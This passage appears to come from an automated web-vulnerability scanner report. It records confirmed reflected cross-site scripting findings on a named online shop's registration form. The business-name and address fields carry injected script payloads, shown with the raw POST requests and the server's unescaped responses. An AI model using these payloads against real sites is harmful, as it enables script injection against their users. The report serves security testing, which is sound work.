<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST '"--></style></script><script>alert(0x0001DE)</script>
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 366
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001DE)%3c%2fscript%3e&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:42:21 GMT
Content-Length: 12518
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="'"--></style></script><script>netsparker(0x0001DE)</script>"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST '"--></style></script><script>alert(0x0001DF)</script>
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001DF)%3c%2fscript%3e&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:42:24 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="'"--></style></script><script>netsparker(0x0001DF)</script>"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST '"--></style></script><script>alert(0x0001E0)</script>
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001E0)%3c%2fscript%3e&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:42:27 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
